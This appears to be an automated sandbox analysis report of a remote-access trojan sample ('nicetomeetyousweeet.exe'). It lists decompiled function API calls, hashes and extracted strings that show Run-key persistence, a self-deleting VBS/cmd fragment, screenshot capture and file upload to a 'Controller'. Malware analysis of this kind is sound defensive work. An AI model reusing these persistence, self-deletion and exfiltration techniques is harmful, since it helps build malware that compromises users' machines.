                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                • String ID: /stext "$HDG$HDG$>G$>G
                                                                                • API String ID: 1223786279-3931108886
                                                                                • Opcode ID: 8bcf76c321c35297f8406ce82bbb0d4928716ef5ba298cb45a686cdac7af4554
                                                                                • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                • Opcode Fuzzy Hash: 8bcf76c321c35297f8406ce82bbb0d4928716ef5ba298cb45a686cdac7af4554
                                                                                • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                • API String ID: 2490988753-744132762
                                                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                APIs
                                                                                  • Part of subcall function 00791900: TerminateProcess.KERNEL32(00000000,?,0078C8E4), ref: 00791910
                                                                                  • Part of subcall function 00791900: WaitForSingleObject.KERNEL32(000000FF,?,0078C8E4), ref: 00791923
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0078C27A
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0078C28D
                                                                                  • Part of subcall function 0079AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00783CA7), ref: 0079ADC6
                                                                                • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0078C4E7
                                                                                • ExitProcess.KERNEL32 ref: 0078C4EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentDeleteExecuteExitFileModuleNameObjectShellSingleTerminateWait
                                                                                • String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$pth_unenc$while fso.FileExists("
                                                                                • API String ID: 508158800-1730539264
                                                                                • Opcode ID: cadd17a6f3b3dd84aa2841c1ffb737251bc648ed92d01ac99516321e3e8970e8
                                                                                • Instruction ID: 1f5e8d91f6efea3b0d17e137d7076397c527b0401654d53bd6959034b7f4b240
                                                                                • Opcode Fuzzy Hash: cadd17a6f3b3dd84aa2841c1ffb737251bc648ed92d01ac99516321e3e8970e8
                                                                                • Instruction Fuzzy Hash: 4281A2716883409BC725FB24E86AEBF73A9AF90701F10442EF44657193EF6C9D0AC796
                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                • String ID: Close
                                                                                • API String ID: 1657328048-3535843008
                                                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Info
                                                                                • String ID:
                                                                                • API String ID: 2509303402-0
                                                                                • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                • __aulldiv.LIBCMT ref: 00407FE9
                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                • API String ID: 1884690901-3066803209
                                                                                • Opcode ID: e05586a99a6dd4973ed6b88060a57d8a8c1e6a93b9a68da99042f90bfc217902
                                                                                • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                • Opcode Fuzzy Hash: e05586a99a6dd4973ed6b88060a57d8a8c1e6a93b9a68da99042f90bfc217902
                                                                                • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0078BEDC
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0078BEF5
                                                                                • _wcslen.LIBCMT ref: 0078BFBB
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0078C043
                                                                                • _wcslen.LIBCMT ref: 0078C09B
                                                                                • CloseHandle.KERNEL32 ref: 0078C102
                                                                                • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000001), ref: 0078C120
                                                                                • ExitProcess.KERNEL32 ref: 0078C137
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcslen$CreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                • String ID: 6$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$BG$BG
                                                                                • API String ID: 3303048660-905209664
                                                                                • Opcode ID: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
                                                                                • Instruction ID: 2a34a3a37d0c618b07c37466d260167f5724cc73cb42df4688881f09da25a181
                                                                                • Opcode Fuzzy Hash: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
                                                                                • Instruction Fuzzy Hash: C651D130388304EBDA29B774AC5AF7E2799AF80741F50442DF40A961D3EF6D9D46C36A
                                                                                APIs
                                                                                • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                • API String ID: 3795512280-3163867910
                                                                                • Opcode ID: 727bc27e4168a8b1df7dc1eb64ab9d23630241c8d7fc75df583e13fa58b12fe7
                                                                                • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                • Opcode Fuzzy Hash: 727bc27e4168a8b1df7dc1eb64ab9d23630241c8d7fc75df583e13fa58b12fe7
                                                                                • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                APIs
                                                                                • Sleep.KERNEL32(00001388), ref: 0078A0C9
                                                                                  • Part of subcall function 00789FFE: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0078A0D6), ref: 0078A034
                                                                                  • Part of subcall function 00789FFE: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0078A0D6), ref: 0078A043
                                                                                  • Part of subcall function 00789FFE: Sleep.KERNEL32(00002710,?,?,?,0078A0D6), ref: 0078A070
                                                                                  • Part of subcall function 00789FFE: CloseHandle.KERNEL32(00000000,?,?,?,0078A0D6), ref: 0078A077
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0078A105
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0078A116
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0078A12D
                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0078A1A7
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0078A2B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                • API String ID: 3795512280-3163867910
                                                                                • Opcode ID: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
                                                                                • Instruction ID: 95c4f997bb61d4ecbadbdc89267f99d5b06174b62c68e7175608a83774ff8744
                                                                                • Opcode Fuzzy Hash: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
                                                                                • Instruction Fuzzy Hash: 3651B130784304DBCB19BB74986EABE739AAF80301F40056DF542A71D3EF2D9906C756
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                • _free.LIBCMT ref: 004500A6
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 004500C8
                                                                                • _free.LIBCMT ref: 004500DD
                                                                                • _free.LIBCMT ref: 004500E8
                                                                                • _free.LIBCMT ref: 0045010A
                                                                                • _free.LIBCMT ref: 0045011D
                                                                                • _free.LIBCMT ref: 0045012B
                                                                                • _free.LIBCMT ref: 00450136
                                                                                • _free.LIBCMT ref: 0045016E
                                                                                • _free.LIBCMT ref: 00450175
                                                                                • _free.LIBCMT ref: 00450192
                                                                                • _free.LIBCMT ref: 004501AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 007D0318
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF567
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF579
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF58B
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF59D
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5AF
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5C1
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5D3
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5E5
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5F7
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF609
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF61B
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF62D
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF63F
                                                                                • _free.LIBCMT ref: 007D030D
                                                                                  • Part of subcall function 007C6D2C: HeapFree.KERNEL32(00000000,00000000,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?), ref: 007C6D42
                                                                                  • Part of subcall function 007C6D2C: GetLastError.KERNEL32(?,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?,?), ref: 007C6D54
                                                                                • _free.LIBCMT ref: 007D032F
                                                                                • _free.LIBCMT ref: 007D0344
                                                                                • _free.LIBCMT ref: 007D034F
                                                                                • _free.LIBCMT ref: 007D0371
                                                                                • _free.LIBCMT ref: 007D0384
                                                                                • _free.LIBCMT ref: 007D0392
                                                                                • _free.LIBCMT ref: 007D039D
                                                                                • _free.LIBCMT ref: 007D03D5
                                                                                • _free.LIBCMT ref: 007D03DC
                                                                                • _free.LIBCMT ref: 007D03F9
                                                                                • _free.LIBCMT ref: 007D0411
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                • Instruction ID: 07409b979baa0f9e84476843531a166a7d9aa41b17a860e2a52a7b09bc7f2531
                                                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                • Instruction Fuzzy Hash: F4313931700204DFEF61AA39E889B5A7BFAEF00310F14652EE459D7261DF3AEC50C664
APIs
• GetCurrentProcessId.KERNEL32 ref: 007911AC
  • Part of subcall function 00792A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 00792A4A
  • Part of subcall function 00792A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A65
  • Part of subcall function 00792A3C: RegCloseKey.ADVAPI32(?,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A70
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 007911E8
• CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 0079124D
  • Part of subcall function 0079271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0079273E
  • Part of subcall function 0079271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0079275C
  • Part of subcall function 0079271E: RegCloseKey.ADVAPI32(00000000), ref: 00792767
• CloseHandle.KERNEL32(00000000), ref: 007911F7
  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 007914C1
Strings
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
• String ID: 0DG$TTF$WDH$BG
• API String ID: 65172268-1505503698
APIs
• __EH_prolog.LIBCMT ref: 0041912D
• GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
• Sleep.KERNEL32(000003E8), ref: 0041926D
• GetLocalTime.KERNEL32(?), ref: 0041927C
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
Strings
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
• String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
• API String ID: 489098229-65789007
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
• ExitProcess.KERNEL32 ref: 0040C832
Strings
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-390638927
APIs
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 007881B3
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00788229
• __aulldiv.LIBCMT ref: 00788250
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00788374
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0078838F
• CloseHandle.KERNEL32(00000000), ref: 00788467
• CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 00788481
• CloseHandle.KERNEL32(00000000), ref: 007884BD
Strings
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
• String ID: Uploading file to Controller: $>G
• API String ID: 1884690901-111729153
APIs
  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
• GetLastError.KERNEL32 ref: 00454A96
• __dosmaperr.LIBCMT ref: 00454A9D
• GetFileType.KERNEL32(00000000), ref: 00454AA9
• GetLastError.KERNEL32 ref: 00454AB3
• __dosmaperr.LIBCMT ref: 00454ABC
• CloseHandle.KERNEL32(00000000), ref: 00454ADC
• CloseHandle.KERNEL32(?), ref: 00454C26
• GetLastError.KERNEL32 ref: 00454C58
• __dosmaperr.LIBCMT ref: 00454C5F
Strings
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
